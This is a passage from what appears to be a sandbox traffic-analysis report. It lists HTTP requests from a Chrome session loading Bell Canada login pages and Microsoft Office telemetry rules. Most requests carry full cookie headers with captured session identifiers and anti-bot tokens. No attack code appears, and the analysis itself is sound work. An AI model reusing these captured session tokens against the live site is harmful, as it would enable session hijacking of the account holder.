TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b96806fe5c793a3730769749ad8989123b; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; ktlvDW7IG5ClOcxYTbmY=a; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtPC=8$580318412_852h1vOSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0e0; dtSa=-; rxvt=1730382118433|1730380318420; DAPROPS="sdevicePixelRatio:1|bjs.deviceOrientation:0|sdeviceAspectRatio:1280/1024|sjs.webGlRenderer:ANGLE (Google, Vulkan 1.3.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver)|sscreenWidthHeight:1280/1024|srendererRef:02166304444|saudioRef:781311942|sversion:1.9.1|bE:0"; TLP409c8162028=08e8c5f15aab20005aa4ba6df11aca23adbc279f49528208e67fdcf24317d98e5780748eea1b1a5a08ba08fb48113000d894c9c9d27d6971a024a83cda35edea7abe9e49a46ed
Source: global trafficHTTP traffic detected: GET /recaptcha/enterprise.js?onload=getCaptchaEnterprise&hl=en&render=6LeIfTIaAAAAAHMPXsezv4PdsckDc-wAJU-eo2YP HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rb_bced360d-a02a-4b73-b0e7-46fe5ae1dc34?type=js3&sn=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0&svrid=8&flavor=post&vi=OSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0&modifiedSince=1730276476420&rf=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&bp=3&app=429b1eac4514c5ce&crc=2219907894&en=gticcd0a&end=1 HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; ktlvDW7IG5ClOcxYTbmY=a; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtPC=8$580318412_852h1vOSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0e0; dtSa=-; DAPROPS="sdevicePixelRatio:1|bjs.deviceOrientation:0|sdeviceAspectRatio:1280/1024|sjs.webGlRenderer:ANGLE (Google, Vulkan 1.3.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver)|sscreenWidthHeight:1280/1024|srendererRef:02166304444|saudioRef:781311942|sversion:1.9.1|bE:0"; __cwaf=true; rxvt=1730382125270|1730380318420; ASP.NET_SessionId=xekfkxdqg0g3hnhhj5c40x2j; TLP025e8c23=028702b9c9718a69ccda5c161a00733ba6478f464a85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b95d928d2fe49eecf0285c093b48a7acad96a13a1e504a27fdb97ebf8496a63b9b; TLP4
Source: global trafficHTTP traffic detected: GET //Web/MYB/custom/image/echat/assets/Chat-Button-Bubbles(D).png HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; ktlvDW7IG5ClOcxYTbmY=a; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtPC=8$580318412_852h1vOSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0e0; dtSa=-; DAPROPS="sdevicePixelRatio:1|bjs.deviceOrientation:0|sdeviceAspectRatio:1280/1024|sjs.webGlRenderer:ANGLE (Google, Vulkan 1.3.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver)|sscreenWidthHeight:1280/1024|srendererRef:02166304444|saudioRef:781311942|sversion:1.9.1|bE:0"; __cwaf=true; rxvt=1730382125270|1730380318420; ASP.NET_SessionId=xekfkxdqg0g3hnhhj5c40x2j; TLP025e8c23=028702b9c9718a69ccda5c161a00733ba6478f464a85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b95d928d2fe49eecf0285c093b48a7acad96a13a1e504a27fdb97ebf8496a63b9b; TLP409c8162028=08e8c5f15aab200092ef1db49b82ddd70fd631bf53f7cfcee05f18e16307d022d317d44e99080f7a0853c694db113000cf3018413db840b1e8264b5dc232ad4eac37ba4f1207501946e9e7373bcebf62912b59ff7b5b4466f823a254c5f49e9a
Source: global trafficHTTP traffic detected: GET /getapploginpage HTTP/1.1Host: m.bell.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtPC=8$580318412_852h1vOSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0e0; dtSa=-; __cwaf=true; rxvt=1730382125270|1730380318420; TLP025e8c23=028702b9c9718a69ccda5c161a00733ba6478f464a85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b95d928d2fe49eecf0285c093b48a7acad96a13a1e504a27fdb97ebf8496a63b9b
Source: global trafficHTTP traffic detected: GET /TeaLeaf/TealeafTarget.aspx HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; ktlvDW7IG5ClOcxYTbmY=a; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtPC=8$580318412_852h1vOSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0e0; dtSa=-; DAPROPS="sdevicePixelRatio:1|bjs.deviceOrientation:0|sdeviceAspectRatio:1280/1024|sjs.webGlRenderer:ANGLE (Google, Vulkan 1.3.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver)|sscreenWidthHeight:1280/1024|srendererRef:02166304444|saudioRef:781311942|sversion:1.9.1|bE:0"; __cwaf=true; rxvt=1730382125270|1730380318420; ASP.NET_SessionId=xekfkxdqg0g3hnhhj5c40x2j; TLP025e8c23=028702b9c9718a69ccda5c161a00733ba6478f464a85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b95d928d2fe49eecf0285c093b48a7acad96a13a1e504a27fdb97ebf8496a63b9b; TLP409c8162028=08e8c5f15aab200092ef1db49b82ddd70fd631bf53f7cfcee05f18e16307d022d317d44e99080f7a0853c694db113000cf3018413db840b1e8264b5dc232ad4eac37ba4f1207501946e9e7373bcebf62912b59ff7b5b4466f823a254c5f49e9a
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /static/bell_common.js?seed=AIBQqeKSAQAA1tX58auB8tK1poG5v7Sf7FQz5cMvgdIpF9clDWjTuQx_YjyA&lmSeL8qArw--z=q HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtPC=8$580318412_852h1vOSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0e0; dtSa=-; DAPROPS="sdevicePixelRatio:1|bjs.deviceOrientation:0|sdeviceAspectRatio:1280/1024|sjs.webGlRenderer:ANGLE (Google, Vulkan 1.3.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver)|sscreenWidthHeight:1280/1024|srendererRef:02166304444|saudioRef:781311942|sversion:1.9.1|bE:0"; __cwaf=true; rxvt=1730382125270|1730380318420; ASP.NET_SessionId=xekfkxdqg0g3hnhhj5c40x2j; TLP025e8c23=028702b9c9718a69ccda5c161a00733ba6478f464a85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b95d928d2fe49eecf0285c093b48a7acad96a13a1e504a27fdb97ebf8496a63b9b; TLP409c8162028=08e8c5f15aab200092ef1db49b82ddd70fd631bf53f7cfcee05f18e16307d022d317d44e99080f7a0853c694db113000cf3018413db840b1e8264b5dc232ad4eac37ba4f1207501946e9e7373bcebf62912b59ff7b5b4466f823a254c5f49e9a
Source: global trafficHTTP traffic detected: GET /recaptcha/enterprise.js?onload=getCaptchaEnterprise&hl=en&render=6LeIfTIaAAAAAHMPXsezv4PdsckDc-wAJU-eo2YP HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /id?d_visid_ver=5.5.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=48B034FA53CF9FD10A490D44%40AdobeOrg&d_nsid=0&ts=1730380327750 HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: */*Origin: https://mybell.bell.caSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /9hb8rBafRwb?_p=c11334dc9a0760eee0188ee3efb2 HTTP/1.1Host: bell.app.linkConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
